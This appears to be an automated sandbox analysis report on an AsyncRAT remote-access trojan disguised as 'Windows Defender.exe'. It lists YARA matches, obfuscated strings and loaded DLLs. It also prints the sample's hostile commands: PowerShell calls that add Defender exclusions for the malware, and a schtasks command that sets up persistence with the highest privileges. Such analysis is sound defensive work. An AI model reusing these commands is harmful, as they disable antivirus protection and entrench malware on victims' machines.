Source: C:\Users\user\AppData\Local\Windows Defender.exe; Code function: 22_2_00007FFD346920C1
Source: Windows Defender.exe, 00000012.00000002.2916151946.00000000010EC000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameclr.dllT vs Windows Defender.exe
Source: Windows Defender.exe, 00000014.00000002.2999231775.0000000001208000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameclr.dllT vs Windows Defender.exe
Source: Windows Defender.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Windows Defender.exe, type: SAMPLE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.Windows Defender.exe.ad0000.0.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.Windows Defender.exe.12ea1a78.0.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000000.00000002.3487954673.0000000012EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000000.00000000.2229425020.0000000000AD2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: C:\Users\user\AppData\Local\Windows Defender.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: Windows Defender.exe, lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.csCryptographic APIs: 'TransformFinalBlock'
                      Source: Windows Defender.exe, lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.csCryptographic APIs: 'TransformFinalBlock'
                      Source: Windows Defender.exe, tBZCWm7wJKWrvEwJjCneXQvYCf0Z1Hh9jgOBkQZCmW6wv8woLGoDUWwpaSbAug.csCryptographic APIs: 'TransformFinalBlock'
                      Source: Windows Defender.exe.0.dr, lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.csCryptographic APIs: 'TransformFinalBlock'
                      Source: Windows Defender.exe.0.dr, lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.csCryptographic APIs: 'TransformFinalBlock'
                      Source: Windows Defender.exe.0.dr, tBZCWm7wJKWrvEwJjCneXQvYCf0Z1Hh9jgOBkQZCmW6wv8woLGoDUWwpaSbAug.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, tBZCWm7wJKWrvEwJjCneXQvYCf0Z1Hh9jgOBkQZCmW6wv8woLGoDUWwpaSbAug.csCryptographic APIs: 'TransformFinalBlock'
                      Source: Windows Defender.exe, HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.csBase64 encoded string: 'zmJZIyrtAB6zwb1f3cBKTdulJiIzhjdwIuFClC8ghF0oFbRL03u0nsp4ST34knk0KtnLPPnziCwyaxeZ', 'KtAfEubdoqgU7cICy6SfkgZwYxxKlSU0UIxCrnYi9L7AC22NqLSInX5SQQOOQN6CqobVJrkVkSRLu20o'
                      Source: Windows Defender.exe, XTL63OWwlW8xwNxHliXe5MQAZDgir0OO3J3aDCgI2Uo9U.csBase64 encoded string: 'qpfyq9LnqydLzmLMJoytp9RlcPGNbjoZuIELFFeGJvfgvccNxSqqeegPEwuRf2CGFbeXsv57wC2wvyeP', 'ZdBNKi2pAGVj0XJjnVbQ8IaqTnqqZjnoJJTCp5ceaYAia1GD9ahP3yfmg1uwKkbkgLo0VZZsMMQ3heHc', 'mePsIuQX1hkcDpPdDepj1WrO7MpylVcOPpPxsV1V8NiJOnfAoUDFkP5xFrEJBhLIgMLDd1fACeNhJEm7'
                      Source: Windows Defender.exe, Xp5eWsWWhMglmS4zYSIjSD4w2EFmG57IhPNnHU1bP52sr.csBase64 encoded string: 'GPsvJuNjyTz65i2snoykbYCYGGsV9Vxx8jKabhUNwlOHrrVUmaULtbK4fsi9cjJjNn3r5iTsfY5zkm4E', 'SarhKHw13cWgtP0H3KWmgiIMCBfTOpF3IrJB2E99LRWcrq6JEKUwcJkmd6f2ww2WNAYglhZi4hmyB9SY', 'MxVwAF0eql5skfC77bwD5zYdBCylZBburbcgzGUOXir4alwX0NftAWcK38c90WrqYAlRp3PuUhPIgCOF', 'KKa07NLsmDpTsxajQ6Y8mLS0LcywJrzG0DX7zNLZ5nX4h0X234MQaiNTUmBxzee2m0Ndto4SJGZ4OJ4g', 'LCHTqglxmez1QAB3P08zS62lz8vOiSHpCyYRmZJnR4Bhc6BE16RiJ92ZVqYX43p0vhkeCUW1zZXD7fVU', 'GeQpkCq1V1er8Y0stflKKXqO4ywSCBCIIrsMie2gvnlQFtMtB4h4op0Xv8B0WkA5uaauQEON0koToNS4', 'Y38kNVzfWDKYks466lSDuLVTnGX9UPc5K0iucKQzESIIerjegKgKCLpQz1cF0NNRvWed8aj0wpjQOA4Y', 'JXnWiLyl8Wssr5AF2abVNGjE6yUO2l3urSLeYJ2MG77zylPnOLMDeqBhnK6mqtCNX9GGpN1ixT8Y6Lta', 'yLWZd6sMz8szo9fWvPSsiKiRNiaEq6MPoyT5n3xnZL9r4GCluJiGV115GI9jc2086Pp5sfw6Gp1twhK1'
                      Source: Windows Defender.exe.0.dr, HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.csBase64 encoded string: 'zmJZIyrtAB6zwb1f3cBKTdulJiIzhjdwIuFClC8ghF0oFbRL03u0nsp4ST34knk0KtnLPPnziCwyaxeZ', 'KtAfEubdoqgU7cICy6SfkgZwYxxKlSU0UIxCrnYi9L7AC22NqLSInX5SQQOOQN6CqobVJrkVkSRLu20o'
                      Source: Windows Defender.exe.0.dr, XTL63OWwlW8xwNxHliXe5MQAZDgir0OO3J3aDCgI2Uo9U.csBase64 encoded string: 'qpfyq9LnqydLzmLMJoytp9RlcPGNbjoZuIELFFeGJvfgvccNxSqqeegPEwuRf2CGFbeXsv57wC2wvyeP', 'ZdBNKi2pAGVj0XJjnVbQ8IaqTnqqZjnoJJTCp5ceaYAia1GD9ahP3yfmg1uwKkbkgLo0VZZsMMQ3heHc', 'mePsIuQX1hkcDpPdDepj1WrO7MpylVcOPpPxsV1V8NiJOnfAoUDFkP5xFrEJBhLIgMLDd1fACeNhJEm7'
                      Source: Windows Defender.exe.0.dr, Xp5eWsWWhMglmS4zYSIjSD4w2EFmG57IhPNnHU1bP52sr.csBase64 encoded string: 'GPsvJuNjyTz65i2snoykbYCYGGsV9Vxx8jKabhUNwlOHrrVUmaULtbK4fsi9cjJjNn3r5iTsfY5zkm4E', 'SarhKHw13cWgtP0H3KWmgiIMCBfTOpF3IrJB2E99LRWcrq6JEKUwcJkmd6f2ww2WNAYglhZi4hmyB9SY', 'MxVwAF0eql5skfC77bwD5zYdBCylZBburbcgzGUOXir4alwX0NftAWcK38c90WrqYAlRp3PuUhPIgCOF', 'KKa07NLsmDpTsxajQ6Y8mLS0LcywJrzG0DX7zNLZ5nX4h0X234MQaiNTUmBxzee2m0Ndto4SJGZ4OJ4g', 'LCHTqglxmez1QAB3P08zS62lz8vOiSHpCyYRmZJnR4Bhc6BE16RiJ92ZVqYX43p0vhkeCUW1zZXD7fVU', 'GeQpkCq1V1er8Y0stflKKXqO4ywSCBCIIrsMie2gvnlQFtMtB4h4op0Xv8B0WkA5uaauQEON0koToNS4', 'Y38kNVzfWDKYks466lSDuLVTnGX9UPc5K0iucKQzESIIerjegKgKCLpQz1cF0NNRvWed8aj0wpjQOA4Y', 'JXnWiLyl8Wssr5AF2abVNGjE6yUO2l3urSLeYJ2MG77zylPnOLMDeqBhnK6mqtCNX9GGpN1ixT8Y6Lta', 'yLWZd6sMz8szo9fWvPSsiKiRNiaEq6MPoyT5n3xnZL9r4GCluJiGV115GI9jc2086Pp5sfw6Gp1twhK1'
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.csBase64 encoded string: 'zmJZIyrtAB6zwb1f3cBKTdulJiIzhjdwIuFClC8ghF0oFbRL03u0nsp4ST34knk0KtnLPPnziCwyaxeZ', 'KtAfEubdoqgU7cICy6SfkgZwYxxKlSU0UIxCrnYi9L7AC22NqLSInX5SQQOOQN6CqobVJrkVkSRLu20o'
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, XTL63OWwlW8xwNxHliXe5MQAZDgir0OO3J3aDCgI2Uo9U.csBase64 encoded string: 'qpfyq9LnqydLzmLMJoytp9RlcPGNbjoZuIELFFeGJvfgvccNxSqqeegPEwuRf2CGFbeXsv57wC2wvyeP', 'ZdBNKi2pAGVj0XJjnVbQ8IaqTnqqZjnoJJTCp5ceaYAia1GD9ahP3yfmg1uwKkbkgLo0VZZsMMQ3heHc', 'mePsIuQX1hkcDpPdDepj1WrO7MpylVcOPpPxsV1V8NiJOnfAoUDFkP5xFrEJBhLIgMLDd1fACeNhJEm7'
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, Xp5eWsWWhMglmS4zYSIjSD4w2EFmG57IhPNnHU1bP52sr.csBase64 encoded string: 'GPsvJuNjyTz65i2snoykbYCYGGsV9Vxx8jKabhUNwlOHrrVUmaULtbK4fsi9cjJjNn3r5iTsfY5zkm4E', 'SarhKHw13cWgtP0H3KWmgiIMCBfTOpF3IrJB2E99LRWcrq6JEKUwcJkmd6f2ww2WNAYglhZi4hmyB9SY', 'MxVwAF0eql5skfC77bwD5zYdBCylZBburbcgzGUOXir4alwX0NftAWcK38c90WrqYAlRp3PuUhPIgCOF', 'KKa07NLsmDpTsxajQ6Y8mLS0LcywJrzG0DX7zNLZ5nX4h0X234MQaiNTUmBxzee2m0Ndto4SJGZ4OJ4g', 'LCHTqglxmez1QAB3P08zS62lz8vOiSHpCyYRmZJnR4Bhc6BE16RiJ92ZVqYX43p0vhkeCUW1zZXD7fVU', 'GeQpkCq1V1er8Y0stflKKXqO4ywSCBCIIrsMie2gvnlQFtMtB4h4op0Xv8B0WkA5uaauQEON0koToNS4', 'Y38kNVzfWDKYks466lSDuLVTnGX9UPc5K0iucKQzESIIerjegKgKCLpQz1cF0NNRvWed8aj0wpjQOA4Y', 'JXnWiLyl8Wssr5AF2abVNGjE6yUO2l3urSLeYJ2MG77zylPnOLMDeqBhnK6mqtCNX9GGpN1ixT8Y6Lta', 'yLWZd6sMz8szo9fWvPSsiKiRNiaEq6MPoyT5n3xnZL9r4GCluJiGV115GI9jc2086Pp5sfw6Gp1twhK1'
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, Q5rYqmkFrCyjhTqjwG8qAWrGPcnIHyXyeJNHX3ZoPPK3S367NSagfidADR3o0oG7aigItouSGKdHm.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, Q5rYqmkFrCyjhTqjwG8qAWrGPcnIHyXyeJNHX3ZoPPK3S367NSagfidADR3o0oG7aigItouSGKdHm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: Windows Defender.exe.0.dr, Q5rYqmkFrCyjhTqjwG8qAWrGPcnIHyXyeJNHX3ZoPPK3S367NSagfidADR3o0oG7aigItouSGKdHm.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: Windows Defender.exe.0.dr, Q5rYqmkFrCyjhTqjwG8qAWrGPcnIHyXyeJNHX3ZoPPK3S367NSagfidADR3o0oG7aigItouSGKdHm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: Windows Defender.exe, Q5rYqmkFrCyjhTqjwG8qAWrGPcnIHyXyeJNHX3ZoPPK3S367NSagfidADR3o0oG7aigItouSGKdHm.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: Windows Defender.exe, Q5rYqmkFrCyjhTqjwG8qAWrGPcnIHyXyeJNHX3ZoPPK3S367NSagfidADR3o0oG7aigItouSGKdHm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@20/21@2/2
                      Source: C:\Users\user\Desktop\Windows Defender.exeFile created: C:\Users\user\AppData\Local\Windows Defender.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4328:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1280:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6768:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6068:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3856:120:WilError_03
                      Source: C:\Users\user\Desktop\Windows Defender.exeMutant created: \Sessions\1\BaseNamedObjects\WR2rJvQsDgMo0fED
                      Source: C:\Users\user\Desktop\Windows Defender.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                      Source: Windows Defender.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Windows Defender.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Users\user\Desktop\Windows Defender.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Windows Defender.exeReversingLabs: Detection: 81%
                      Source: C:\Users\user\Desktop\Windows Defender.exeFile read: C:\Users\user\Desktop\Windows Defender.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Windows Defender.exe "C:\Users\user\Desktop\Windows Defender.exe"
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Windows Defender.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender" /tr "C:\Users\user\AppData\Local\Windows Defender.exe"
                      Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Windows Defender.exe "C:\Users\user\AppData\Local\Windows Defender.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Windows Defender.exe "C:\Users\user\AppData\Local\Windows Defender.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Windows Defender.exe "C:\Users\user\AppData\Local\Windows Defender.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Windows Defender.exe "C:\Users\user\AppData\Local\Windows Defender.exe"
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Windows Defender.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender" /tr "C:\Users\user\AppData\Local\Windows Defender.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
